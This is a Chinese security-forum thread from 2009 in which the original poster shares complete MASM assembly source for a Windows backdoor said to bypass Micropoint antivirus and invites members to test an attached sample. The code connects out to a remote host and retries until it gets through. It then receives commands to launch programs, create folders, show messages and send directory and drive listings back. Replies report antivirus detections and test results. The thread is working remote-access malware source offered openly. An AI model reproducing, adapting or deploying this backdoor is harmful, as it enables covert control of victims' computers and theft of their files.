收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 据说过微点后门程序(大家测试一下)
123下一页
返回列表 发新帖
查看: 4275|回复: 21
收起左侧

据说过微点后门程序(大家测试一下)

[复制链接]
飘飘世界
头像被屏蔽
发表于 2009-5-2 21:56:27 | 显示全部楼层 |阅读模式
代码


  .386
  .model flat,stdcall
  option casemap:none
include  windows.inc
include  user32.inc
includelib user32.lib
include  kernel32.inc
includelib kernel32.lib
include  wsock32.inc
includelib wsock32.lib
include         shell32.inc
includelib      shell32.lib
include         _Message.inc
.data?
  @szBuffer db   256 dup (?)
  @stmsg    MSG_STRUCT <>
  hSocket   dd   ?
  @FindData1  WIN32_FIND_DATA <>
.data
  @stSin sockaddr_in <AF_INET,401Fh,<<<7fh,0,0,1>>>,8 dup (0)>
  
.code
include         _SocketRoute.asm
;//////////////////////////////////////////////////////////////////////////////
_order proc  _msg:ptr MSG_STRUCT
     local @FindData:WIN32_FIND_DATA
     local @szFindFile[MAX_PATH]:byte
     local @hFindFile
   assume esi:ptr MSG_STRUCT
   mov esi,_msg
   ;invoke RtlZeroMemory,esi,sizeof MSG_STRUCT
   .if [esi].MsgHead.dwCmdId == CMD_MSGBOX
        add esi,6
        invoke lstrlen,esi
        inc eax
        mov edi,esi
        add esi,eax
        invoke MessageBox,NULL,esi,edi,MB_OK
   .elseif [esi].MsgHead.dwCmdId == CMD_CREATEFOLDER
        add esi,6
        invoke CreateDirectory,esi,0
   .elseif [esi].MsgHead.dwCmdId == CMD_CREATEPROCESS
        add esi,6
        invoke ShellExecute,0,0,esi,0,0,SW_SHOWNORMAL
   .elseif [esi].MsgHead.dwCmdId == CMD_BROWSE
        .if dword ptr [esi].MsgHead.dwLength == 7
          invoke  GetLogicalDriveStrings,sizeof MSG_STRUCT.FILE.dbFILE,addr [esi].FILE.dbFILE
          push edi
          mov edi,esi
          add edi,6
         _len:
          invoke  lstrlen,edi
          inc eax
          add edi,eax
          .if dword ptr [edi] == 0
          jmp _send
          .endif
          jmp _len
         _send:
          sub edi,esi
          inc edi
          mov [esi].MsgHead.dwLength,edi
          pop edi
          mov [esi].MsgHead.dwCmdId,CMD_DRIVES
          invoke send,hSocket,esi,[esi].MsgHead.dwLength,0
          ret
        .endif
        add esi,6
        invoke FindFirstFile,esi,addr @FindData
        .if  eax != INVALID_HANDLE_VALUE
           mov   @hFindFile,eax
           .repeat
                  invoke  lstrcpy,esi,addr @FindData.cFileName                                                              
                  .if @FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY
                        .if @FindData.cFileName == '.'
                               jmp _next
                        .endif  
                           mov  @stmsg.MsgHead.dwCmdId,CMD_FOLDERNAME
                  .else
                           mov  @stmsg.MsgHead.dwCmdId,CMD_FILENAME         
                  .endif
                  invoke  lstrlen,addr @FindData.cFileName
                  add eax,6
                  inc eax
                  mov  @stmsg.MsgHead.dwLength,eax
                  invoke send,hSocket,addr @stmsg,@stmsg.MsgHead.dwLength,0
             _next:     
                invoke FindNextFile,@hFindFile,addr @FindData
           .until (eax == FALSE)
        .endif
        mov @stmsg.MsgHead.dwLength,6
        mov @stmsg.MsgHead.dwCmdId,CMD_END
        invoke send,hSocket,OFFSET @stmsg,@stmsg.MsgHead.dwLength,0
   .endif
   assume esi:nothing
  ret
_order endp
;////////////////////////////////////////////////////////////////////////////////
_WinMain proc
   local  @stWsa:WSADATA,ipaddr:dword
  _st:
  invoke WSAStartup,101h,addr @stWsa
  invoke gethostname,OFFSET @szBuffer,1024
  invoke gethostbyname,OFFSET @szBuffer
  .if eax
     mov    eax,[eax+hostent.h_list]
     .while dword ptr [eax]
            mov ecx,[eax]
            mov ecx,[ecx]
            add eax,4
     .endw
  .endif
   mov ipaddr,ecx
   invoke socket,AF_INET,SOCK_STREAM,0
   mov hSocket ,eax
_connect:   
   invoke connect,hSocket,addr @stSin,sizeof @stSin
   .if eax == SOCKET_ERROR
       invoke Sleep,6000
       jmp _connect
   .endif
    invoke inet_ntoa,ipaddr
    .if eax
       invoke lstrcpy,OFFSET @stmsg.CONNET.ddIp,eax
    .endif
    invoke lstrlen,OFFSET @stmsg.CONNET.ddIp
    add eax,7
    mov @stmsg.MsgHead.dwCmdId,CMD_CONNECT
    mov @stmsg.MsgHead.dwLength,eax
    invoke send,hSocket,OFFSET @stmsg,@stmsg.MsgHead.dwLength,0
    cmp eax,SOCKET_ERROR
    jz _ret
          .while TRUE
              invoke _WaitData,hSocket,200 * 1000
             .break .if eax == SOCKET_ERROR
             .if     eax
                     invoke _RecvPacket,hSocket,addr @stmsg,sizeof @stmsg
                     .break .if eax
                    ;处理代码
                    invoke  _order,OFFSET @stmsg
             .endif
          .endw
  _ret:
   invoke closesocket,hSocket
   jmp _st
   ret
_WinMain endp
start:
          call _WinMain
          nop
          invoke ExitProcess,NULL
end start

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

飘飘世界
头像被屏蔽
 楼主| 发表于 2009-5-2 21:56:53 | 显示全部楼层
这是一个后门程序
可以连接到远程计算机
可以接受指令
浏览目录 上传文件 下传文件
回复

举报

西门东郭
发表于 2009-5-3 08:01:38 | 显示全部楼层
实际测试,闪了一个窗口后没动静了
回复

举报

xxl
发表于 2009-5-3 10:45:56 | 显示全部楼层
KIS8.0 拒绝
2009-5-3 10:42:55 http://bbs.kafan.cn/attachment.php?aid=526926&k=2f2bdf64fa34a32c0a77f132d5fb8e4f&t=1241318560//6.exe//PE_Patch.UPX//UPX Internet Explorer 检测到威胁: Trojan-GameThief.Win32.Magania.baex  

2009-5-3 10:41:12        http://googleads.g.doubleclick.n ... A//bbs.tytytyty.com        Internet Explorer        拒绝: *728x90*        数据库
2009-5-3 10:40:47        http://googleads.g.doubleclick.n ... //bbs.tytytytyt.com        Internet Explorer        拒绝: *728x90*        数据库

[ 本帖最后由 xxl 于 2009-5-3 10:49 编辑 ]
回复

举报

shmily512099
发表于 2009-5-3 11:15:50 | 显示全部楼层



啥动作?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

ezpod32432
发表于 2009-5-3 11:38:37 | 显示全部楼层
我是来慰问吃螃蟹的同志们的 五一节快乐
回复

举报

haoge868
发表于 2009-5-3 11:45:10 | 显示全部楼层
关注下
回复

举报

Lazey
发表于 2009-5-3 12:00:30 | 显示全部楼层
穿墙不
回复

举报

王子带着刀
发表于 2009-5-3 15:15:05 | 显示全部楼层
不测了 观看不怕死的测试
回复

举报

zdlzp
发表于 2009-5-3 15:53:50 | 显示全部楼层
原帖由 shmily512099 于 2009-5-3 11:15 发表
526980


啥动作?


一样
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-3-21 10:18 , Processed in 0.073139 second(s), 2 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表